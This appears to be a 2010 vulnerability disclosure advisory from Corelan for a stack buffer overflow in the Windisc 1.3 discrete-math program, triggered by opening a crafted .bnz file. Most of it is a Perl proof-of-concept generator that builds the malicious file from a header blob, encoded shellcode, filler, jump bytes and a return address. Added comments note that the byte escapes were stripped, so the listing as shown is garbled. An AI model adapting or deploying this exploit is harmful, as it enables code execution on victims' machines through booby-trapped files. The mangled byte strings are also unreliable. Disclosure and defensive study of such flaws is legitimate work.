# Title : Windisc Stack BOF exploit
# Published : 2010-03-16
# Author : Rick2600
|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@corelan.be |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|
Advisory : CORELAN-10-013
Disclosure date : March 16, 2010
0x00 : Vulnerability information
--------------------------------
[*] Product : Windisc
[*] Version : 1.3
[*] Vendor : RParris
[*] URL : http://math.exeter.edu/rparris/windisc.html
[*] Platform : Windows
[*] Type of vulnerability : Stack Buffer overflow
[*] Risk rating : Medium
[*] Issue fixed in version : Unknown
[*] Vulnerability discovered by : Rick2600
[*] Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/
0x01 : Vendor description of software
-------------------------------------
From the vendor website:
Windisc is a collection of subprograms that deal with discrete-math topics such as
apportionment, voting power, voting methods, and network analysis
(traveling salesman problem, map-coloring, etc).
0x02 : Vulnerability details
----------------------------
The vulnerability is triggered when a user opens a crafted Banzhaf (.bnz) file in the application; no further interaction is needed beyond loading the file.
EAX 00A193BC
ECX 0000000B
EDX 00A193BC
EBX 00A16638
ESP 0012F778 ASCII "AAAAAAAAAAAAAAAAAA..."
EBP 41414141
ESI 00A4D158
EDI 0000000C
EIP 41414141
0x03 : Vendor communication
---------------------------
[*] Feb 15 2010: Author contacted (no replies)
[*] Mar 08 2010: Vulnerability disclosed
0x04 : Exploit/PoC
------------------
Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
# PoC generator: writes a single crafted .bnz file (windisc_poc.bnz) made of a
# fixed header blob, filler bytes, a second fixed blob, more filler, two short
# byte sequences and a little-endian packed value (see pack("V") below).
#
# NOTE(review): the "x.." sequences throughout this listing appear to have lost
# their backslash escapes during extraction, so the script as pasted does not
# reproduce the byte strings the author intended -- treat this listing as a
# record of the advisory, not as a runnable file.
#
# Defender notes: the affected parser trusts the length of fields in a .bnz file
# (advisory section 0x02), and no fixed version is known (section 0x00).  Until a
# vendor fix exists, .bnz files from untrusted sources should not be opened; the
# generated file is recognisable by its unusual size for the format and by long
# runs of a single repeated byte (the "A" x 300 / "B" x N filler below).
#
# Perl hygiene: the script has no `use strict; use warnings;` preamble.
print "|------------------------------------------------------------------|n";
print "| __ __ |n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |n";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |n";
print "| |n";
print "| http://www.corelan.be:8800 |n";
print "| |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] PEAnut Discrete Math Package Exploitn";
# Output file name; written relative to the current working directory.
my $sploitfile="windisc_poc.bnz";
# Fixed header blob copied verbatim from a .bnz file (format not documented
# on this page; the field meanings below are not known from this listing).
my $header=
"x77x03x00x00x03x00x00x00x36x00x00x00x3bx00x00x00".
"x50x03x00x00x3cx02x00x00x00x00x00x00x01x00x00x00".
"x3dx00x00x00xd9xffxffxffx2cx01x00x00x64x00x00x00".
"x64x00x00x00x00x00x00x00x00x00x00x00x0ax00x00x00".
"x0fx00x00x00x2bxd0x28x01x49x1ex29x01x00x00x00x00".
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x08x00x00x00".
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00".
"x0ax00x00x00x0ax00x00x00xf0xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x02x08x02x01x31".
"x53x79x6dx62x6fx6cx00x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00".
"x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72".
"x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xf5xffxffxff".
"x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00".
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20".
"x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00xf0xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x02".
"x54x69x6dx65x73x00x72x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00".
"x90x01x00x00x00x00x00x00x08x02x01x31x43x6fx75x72".
"x69x65x72x20x4ex65x77x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00xf3xffxffxff".
"x00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00".
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20".
"x4ex65x77x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00xf3xffxffxffx00x00x00x00".
"x00x00x00x00x00x00x00x00x90x01x00x00x00x00x00x00".
"x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xf3xffxffxffx00x00x00x00x00x00x00x00".
"x00x00x00x00x90x01x00x00x00x00x00x00x08x02x01x31".
"x43x6fx75x72x69x65x72x20x4ex65x77x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x24xf9x12x00x91x74x49x00".
"x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91x74x49".
"x00x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91x74".
"x49x00x1cx83x4bx00x00x00x00x00x00x24xf9x12x00x91".
"x74x49x00x1cx83x4bx00x00x00x00x00x00x13x00x13x00".
"x13x00x13x00x13x00x13x00x13x00x04x00x00x00x06x00".
"x13x00x13x00x13x00x13x00x13x00x00x00x00x00xffxff".
"xffx00xffx00xffx00xffxffx00x00xffx00x00x00x00xbf".
"x3fx00x00x00xffx00x00x7fx7fx00xffx7fx00x00xffx00".
"x7fx00xa0x2fx00x00x00xffxffx00xbfxbfx7fx00x7fx00".
"x7fx00x20xffx00x00xffx7fx7fx00x87x87x00x00x00x3c".
"xa0x00xe0xe0xe0x00xc0xc0xc0x00xa0xa0xa0x00x80x80".
"x80x00x60x60x60x00x40x40x40x00xbfx00x3fx00x7exde".
"xffx00xffxccxccx00xffx7exdex00xffxdex7ex00xdexff".
"x7ex00x7exffxdex00xffxffxbfx00xffxbfxffx00xbfxff".
"xffx00xffxffxdex00xffxdexffx00xdexffxffx00xb1xde".
"xd4x00xb1xd4xdex00xd4xb1xdex00xd4xdexb1x00xdexb1".
"xd4x00xdexd4xb1x00xbfxf1xdex00xbfxdexf1x00xdexf1".
"xbfx00xdexbfxf1x00xf1xdexbfx00xf1xbfxdex00xffx96".
"xeax00x96xeaxffx00xccxccxccx00xc8x70x00x00xdexcd".
"x00x00xdex68x20x00x14x82x28x00xc0x00xa0x00xd4x28".
"x28x00x50x84xb0x00x64xa0xc8x00x14x64x14x00x0cx00".
"x00x00x07x00x00x00xffxffxffxffx01x00x00x00x00x00".
"x00x00xffxffxffxffxffxffxffxffxb1x00x00x00x05x00".
"x00x00x32x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x0bx00x00x00x16x00x00x00x2fx00".
"x00x00x24x00x00x00x1ex00x00x00x24x00x00x00x2dx00".
"x00x00x20x00x00x00x23x00x00x00x11x00x00x00x1fx00".
"x00x00x0bx00x00x00x07x00";
#MsgBox Corelan Team
# Second fixed blob; per the author's comment above it only displays a message
# box (not verifiable from this listing).
my $shellcode=
"x2bxc9xdbxcaxb1x4bxd9x74x24xf4x5axbfxc8xac" .
"x87x72x31x7ax16x83xeaxfcx03x7axdax4ex72x24" .
"xebx4ex4cx12xb8x7fxcbx2fxbdxf4x53x3cx4ax4a" .
"x40x6cx12xc0x6exdcxf4x5dx68x57x48x72x2bx8e" .
"xdax72xd3x50xbaxf9xbfx74x1ex75x7ax49xd5xdd" .
"x80xc9xe8x37x01x63xf2x4cx4cx54x03xb8x92xa3" .
"x4axb5x61x47x4dx27xb8xa8x7cx77x47xfaxfaxb7" .
"xccx09xc3xf7x20x0fx04xeexcaxf0x75x0ex17x73" .
"xadxd9x1dx55x26x43xfax68xd3x12x89x67x68x50" .
"xd7x6bx6fx8dx63x97xe4x50x9cx11xbex76x40x43" .
"xfdxdax28xd1xe9x82x36x2ax16x45xcfx54x2cx5e" .
"xd0x56xacxdex17x52xacxe0x97x62x62x95x71x57" .
"x92x10x7ex58x62xe8x0dx3dx10x21xc0x93xb0x29" .
"x48xecxd0x92x90xecx20x5dxdexe2xccx1fx07x18" .
"x7fx08x84xddx7fxc8x43x7fx32x74x12x6cxc4x84" .
"x15x6dx5dx61x9cxafxb4xb1x60xd0xb9x18x12x52" .
"x41x2cxddx2cx88x26x1ex2fx0axdfx81xd0xf5xe0" .
"x57x9bxf6xe0x57x1bx5dx1bx21x26xb4xebxcex58" .
"xb9xb2x9dxf7x17xa3xe8x08x68xccxfcxe2x96x33" .
"xffx57x7fx29xffx67x7fx17xcexb5x2dxf4x61x68" .
"x2ex2axb0x4cx80x34xe6x44xc8x2dxf6xaaxf7xe2" .
"x7ex3bx62x67x81x2bx8dx98x7ex54x0ex08xf3xce" .
"xfcxb7x9dx30xa8x52x03x5cx70xedxb4xf0x15x69" .
"x3bx07";
print "[+] Preparing payloadn";
# Assemble the file contents in order: header, 300-byte filler, the blob above,
# a filler that pads the blob to 772 bytes, two short fixed sequences, and one
# 32-bit little-endian value.
my $payload = $header;
$payload .= "A" x 300;
$payload .= $shellcode;
# Pads to a fixed total of 772 bytes for this section; goes negative (and so
# appends nothing) if $shellcode ever exceeds 772 bytes -- not checked here.
$payload .= "B" x (772 - length($shellcode));
$payload .= "xE9xB9xFCxFFxFF";
$payload .= "xEBxF9x90x90";
$payload .= pack("V", 0x00405437);
print "[+] Writing payload to filen";
# Two-arg open on a bareword handle with no error check: if the open fails the
# script still prints "Wrote N bytes" below.  Idiomatic form is the 3-arg
# lexical `open my $fh, '>', $sploitfile or die "open $sploitfile: $!";`.
open(FILE,">$sploitfile");
binmode (FILE);
print FILE $payload;
# close is unchecked too; buffered write errors would surface here.
close(FILE);
print "[+] Wrote ".length($payload)." bytes to file $sploitfilen";